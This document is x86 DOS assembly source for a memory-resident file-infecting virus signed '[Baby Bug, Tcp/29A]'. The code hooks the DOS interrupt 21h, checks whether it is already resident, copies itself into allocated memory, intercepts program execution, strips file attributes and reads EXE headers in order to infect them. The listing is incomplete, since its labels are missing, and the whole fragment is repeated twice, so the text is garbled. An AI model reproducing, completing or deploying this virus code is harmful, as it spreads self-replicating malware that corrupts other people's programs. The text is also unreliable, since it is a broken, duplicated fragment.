baby segment
assume cs:baby, ds:baby, es:baby, ss:baby
org 0
VIRUS_SIZE = end_virus - start
VIRUS_MEM_SIZE = memsize - start
VIR_PARAG = (VIRUS_MEM_SIZE + 15) / 16 + 1
delta_ofs equ word ptr $+1
mov si,0 ; mov si,delta_ofs
push ds
push es
mov ax,ds
add ax,10h
add cs:[si+f_relocs],ax ; Relocate host CS & SS
add cs:[si+f_reloss],ax
mov ax,0BAB1h ; Resident check
int 21h
cmp ax,0BA03h ; Already resident?
je exec_host ; Yes? then jmp
mov ax,ds
dec ax
mov ds,ax
mov bx,ds:[0003]
sub bx,VIR_PARAG+1
mov ah,4Ah
int 21h ; Adjust current block
mov ah,48h
mov bx,VIR_PARAG
int 21h ; Get memory
mov es,ax
push cs
pop ds
xor di,di
rep movsb ; Copy virus to allocated mem
push es
push offset(mem_copy)
db '[Baby Bug, Tcp/29A]'
push cs
pop ds
dec ax
mov es,ax
mov word ptr es:[0001],8 ; DOS MCB
mov ax,3521h ; Read int 21h
int 21h
mov [di],bx ; Store it
mov [di+2],es
mov dx,offset(vir_21h) ; Virus int 21h
mov ah,25h
int 21h
pop es
pop ds
db 68h ; push f_reloss
f_reloss dw 0FFF0h
pop ss
f_exesp equ word ptr $+1
mov sp,offset(memsize) ; mov sp,f_exesp
db 0EAh ; jmp host entry point
f_exeip dw 0
f_relocs dw 0FFF0h
cmp ax,0BAB1h ; Resident check?
jne check_exec ; No? then jmp
mov al,3
cmp ax,4B00h ; Exec file?
je process_file ; Yes? then jmp
jmp jmp_real_21
push ds
push es
mov ax,3524h
int 21h ; Read int 24h
push es
push bx
mov ah,25h
push ax
push ds
push dx
push cs
pop ds
mov dx,offset(int_24h)
int 21h ; Set virus int 24h
pop dx
pop ds
mov ax,4300h
push ax
int 21h ; Read file attributes
pop ax
inc ax
push ax
push cx
push ds
push dx
xor cx,cx
int 21h ; Reset file attributes
jnc open_file
jmp restore_attr
mov ax,3D02h
int 21h ; Open file I/O
jc jmp_r_attr
xchg ax,bx
push cs
pop ds
push cs
pop es
mov ax,5700h
int 21h ; Get file date/time
push ax
push cx
push dx
mov ah,3Fh
mov dx,offset(file_header)
mov cx,18h
int 21h ; Read file header
mov si,dx
lodsw ; Signature
cmp ax,'MZ' ; EXE?
je infect_exe ; Yes? then jmp
cmp ax,'ZM' ; EXE?
jne jmp_r_datetime ; Yes? then jmp
baby segment
assume cs:baby, ds:baby, es:baby, ss:baby
org 0
VIRUS_SIZE = end_virus - start
VIRUS_MEM_SIZE = memsize - start
VIR_PARAG = (VIRUS_MEM_SIZE + 15) / 16 + 1
delta_ofs equ word ptr $+1
mov si,0 ; mov si,delta_ofs
push ds
push es
mov ax,ds
add ax,10h
add cs:[si+f_relocs],ax ; Relocate host CS & SS
add cs:[si+f_reloss],ax
mov ax,0BAB1h ; Resident check
int 21h
cmp ax,0BA03h ; Already resident?
je exec_host ; Yes? then jmp
mov ax,ds
dec ax
mov ds,ax
mov bx,ds:[0003]
sub bx,VIR_PARAG+1
mov ah,4Ah
int 21h ; Adjust current block
mov ah,48h
mov bx,VIR_PARAG
int 21h ; Get memory
mov es,ax
push cs
pop ds
xor di,di
rep movsb ; Copy virus to allocated mem
push es
push offset(mem_copy)
db '[Baby Bug, Tcp/29A]'
push cs
pop ds
dec ax
mov es,ax
mov word ptr es:[0001],8 ; DOS MCB
mov ax,3521h ; Read int 21h
int 21h
mov [di],bx ; Store it
mov [di+2],es
mov dx,offset(vir_21h) ; Virus int 21h
mov ah,25h
int 21h
pop es
pop ds
db 68h ; push f_reloss
f_reloss dw 0FFF0h
pop ss
f_exesp equ word ptr $+1
mov sp,offset(memsize) ; mov sp,f_exesp
db 0EAh ; jmp host entry point
f_exeip dw 0
f_relocs dw 0FFF0h
cmp ax,0BAB1h ; Resident check?
jne check_exec ; No? then jmp
mov al,3
cmp ax,4B00h ; Exec file?
je process_file ; Yes? then jmp
jmp jmp_real_21
push ds
push es
mov ax,3524h
int 21h ; Read int 24h
push es
push bx
mov ah,25h
push ax
push ds
push dx
push cs
pop ds
mov dx,offset(int_24h)
int 21h ; Set virus int 24h
pop dx
pop ds
mov ax,4300h
push ax
int 21h ; Read file attributes
pop ax
inc ax
push ax
push cx
push ds
push dx
xor cx,cx
int 21h ; Reset file attributes
jnc open_file
jmp restore_attr
mov ax,3D02h
int 21h ; Open file I/O
jc jmp_r_attr
xchg ax,bx
push cs
pop ds
push cs
pop es
mov ax,5700h
int 21h ; Get file date/time
push ax
push cx
push dx
mov ah,3Fh
mov dx,offset(file_header)
mov cx,18h
int 21h ; Read file header
mov si,dx
lodsw ; Signature
cmp ax,'MZ' ; EXE?
je infect_exe ; Yes? then jmp
cmp ax,'ZM' ; EXE?
jne jmp_r_datetime ; Yes? then jmp